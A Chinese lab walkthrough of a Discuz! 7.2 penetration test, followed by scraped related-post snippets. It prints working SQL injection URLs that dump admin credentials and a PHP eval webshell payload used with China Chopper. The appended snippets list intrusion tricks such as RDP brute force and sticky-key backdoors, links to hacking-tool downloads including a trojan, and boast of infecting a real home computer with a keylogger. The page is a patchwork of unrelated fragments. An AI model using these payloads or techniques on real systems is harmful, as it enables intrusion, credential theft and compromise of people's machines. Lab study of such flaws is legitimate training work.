1.网站综合渗透_Discuz!

这综合测试之前,小伙伴们可以先去了解了解Dz7.2的一些漏洞和特性,我就不在这说了:

第一步,看指导说明:

一进来,我就发现,我们的目标网站的系统是Discuz!的论坛,在一看发现版本是7.2然后

我们就去百度一下相关漏洞所在,查看到的便是faq.php的注入漏洞

具体漏洞解释就自己去看看,直接上代码

第一步检查是否有注入漏洞:

192.168.1.3/faq.php?action=grouppermission&gids[99]=‘&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

由图可知,由注入漏洞,注入也在途中给出,接下来就是查询管理员账号密码了

192.168.1.3/faq.php?action=grouppermission&gids[99]=‘&gids[100][0]=)
and (select 1 from (select count(*),concat((select concat(username,0x7e7e,password,0x7e7e) from cdb_members limit 0,1),floor(rand(0)*2))x
from information_schema.tables group by x)a)%23

其中0x7e7e为 ~~的16进制,用来分割账号和密码

爆出来了,管理员账号和hash加密的密码

!注意:这个加密的秘密要拿到,实验平台去解密如下图:

得到密码以后,就去先登陆后台,然后进入管理

找到key1

接下来,我们就要去想办法控制服务器,找插入点插入一句话

由于自己搭建环境查看可以知道,要这样构造

xx\‘);eval($_POST[a]);?>\\

前面\是因为,直接输入单引号会被注释掉,所以需要注释掉注释

后面的\\注释掉后面的所以语句

于是,我们插入一句话提交,然后使用菜刀连接:注意连接的地址

连接成功:

然后,去寻找key2,去查看被攻击服务器上的config.inc.php页面

然后下载过来查看,发现了数据库账户和密码

接下来,用菜刀去连接数据库:

再来,就是去查看数据库,其中下面图中3个加密的密码之一就是key2的密码,还是利用指导实验下面那个框来解密

然后继续查看数据库内容,发现key3

数据库没什么以后,查看文件里面的,发现key4的压缩包

下载下了后,我们用文本查看,发现得到一串加密的字符串:

先把字符串转为10进制的字母,然后得到base64加密过的密码,在解密得到key4

最后,我们在去文件里面逛逛发现key5:

这一次下载下来直接打开就是key了

如果有什么出错的,欢迎指出

时间: 2024-11-14 13:17:03

1.网站综合渗透_Discuz!的相关文章

实验吧delecms综合渗透

环境说明: 名字:网站综合渗透_dedecms 环境:目标机:192.168.1.3 织梦cms 开始渗透: 网站首页: 先去后台看看.看看默认后台dede在不在,答案是存在的,如下图 得到key2: 得到了后台,但是不知道密码,但是觉得这种实验环境后台密码应该都是弱口令 于是试了一下账号:admin 密码:admin123 登录成功:登录成功的地方会显示key2,但是一闪即逝,就不截图了. 得到key4: 得到key1: 得到key3:在默认模板里 得到key5:添加一个一句话木马,用菜刀连接

网站个人渗透技巧收集与总结

1.利用网站过滤不严直接绕过后台验证,在网站后面加上 admin/session.asp 或 admin/left.asp 2.有的网站进后台会出现一个脚本提示框,输入:administrator 即可突破!admin代表以管理员身份进入的意思. 3.有的网站开了3389,入侵之前先去连接3389,尝试弱口令或是爆破,再者就是按5次shift键,看看有没前人装过后门,然后再社工密码. 4.有时候进后台会弹出提示框“请登陆”,把地址抄写出来(复制不了),然后放在网页源代码分析器里,选择浏览器-拦截

企业网站综合布局实战

网站分布 头部logo,导航区,内容展示,底部版权 盒子模型复习 div是块级元素,会另起一行 span 内联元素 块级元素自己占一行,不能有其他元素和他在同一行 浮动框脱离文档流,不占据普通文档的位置 网页头部分解 设置盒子内容在水平方向居中: text-align:center 垂直居中,设置行高line-height等于盒子的高度 超链接:a:link 初始状态 a:visited 访问过后 a:hover 悬停经过状态 a:active 点击状态 a标签属于内联元素,无高度和宽度属性,因

城通网盘分享

-中国菜刀(完整版).zip: 点击进入高速下载通道1100.后台插一句话双引号的问题.zip: 点击进入高速下载通道2105.批量检测时谷歌搜索结果却只有10页,.....zip: 点击进入高速下载通道3107.网站入侵个人经验总结.zip: 点击进入高速下载通道420151225mxd.zip: 点击进入高速下载通道53389mstsc服务器批量验证管理V1.4.zip: 点击进入高速下载通道6360写启动项添加信任模块.rar: 点击进入高速下载通道7404渗透小组专用大马.rar: 点击

网站渗透工具大全

一. 基于网站的渗透 1.名称:Acunetix Web Vulnerability Scanner 6 功能:网站漏洞扫描器. 平台:Windows 2.名称:IBM Rational AppScan 7.8 功能:网站漏洞扫描器. 平台:Windows 3.名称:Jsky 功能:网站漏洞扫描器. 平台:Windows 4.名称:DTools 功能:阿D的多功能入侵工具,带扫描.植马等. 平台:Windows 5.名称:wepoff 功能:网站漏洞扫描器. 平台:Linux / Unix 6.

IT综合学习网站收集

最近整理了一下曾经使用过的IT从入门到广泛的综合类基础学习网站,记录下来,以便初学者使用: 1.http://www.w3school.com.cn/  中文版基础在线学习平台 2.http://www.runoob.com/ 中文版基础在线学习平台(和W3类似) 3.http://www.imooc.com/ 慕课网(大部分免费,强烈推荐) 4.http://www.jikexueyuan.com/ 极客学院(会员需要收费,大概每年300左右,课程比较全面,最新技术有些是按照课时收费的) 5.

PHP网站渗透中的奇技淫巧:检查相等时的漏洞

PHP是现在网站中最为常用的后端语言之一,是一种类型系统 动态.弱类型的面向对象式编程语言.可以嵌入HTML文本中,是目前最流行的web后端语言之一,并且可以和Web Server 如apache和nginx方便的融合.目前,已经占据了服务端市场的极大占有量. 但是,弱类型,一些方便的特性由于新手程序员的不当使用,造成了一些漏洞,这篇文章就来介绍一下一些渗透中可以用的特性. 上面都是废话,下面我们进入正题 1.弱类型的比较==导致的漏洞 注:这些漏洞适用于所有版本的php 先来复习一下基本的语法

因为空间日志不能发表那么就发表到博客里来吧.实战渗透拿湖南IP 个人计算机宽带电脑...呵呵空间有截图 这上面就不发了..当然 下面是有 键盘记录的 你们自己看记录 自己破解吧 福利 还请各位多多关注我的博客@

前言:为了测试更好的 六道轮回病毒....当然  寒龙哥 我 直接搞肉鸡了....呵呵话虽如此.也会给大家发一些福利的..额 对了下面呢?有很多值得的  信息 比如说花生壳域名等等.... 呵呵大家自己看看键盘记录吧..貌似还有新浪微博了.......算 了 今天的  例程入侵思路简单 渗透xp+提权系统权限——传马-+传毒+K杀毒.....废话不多说大家自己搞搞吧...呵呵 哦 公布一下一个xp的0day挂马漏洞! html挂马代码 ...供给大家学习利用!!!!!利用windows 进行执行

查看网站pv

PV(page view),即页面浏览量,或点击量:通常是衡量一个网络新闻频道或网站甚至一条网络新闻的主要指标.简单来解释PV,那就是一个访问者在24小时(0点到24点)内到底看了你网站多少个页面.这里需要强调:同一个人浏览你网站同一个页面,不重复计算PV量,点100次也算1次.说白了,PV就是一个访问者打开了你的几个页面.PV之于网站,就像收视率之于电视,从某种程度上已成为投资者衡量商业网站表现的最重要尺度.PV的计算:当一个访问者访问的时候,记录他所访问的页面和对应的IP,然后确定这个IP今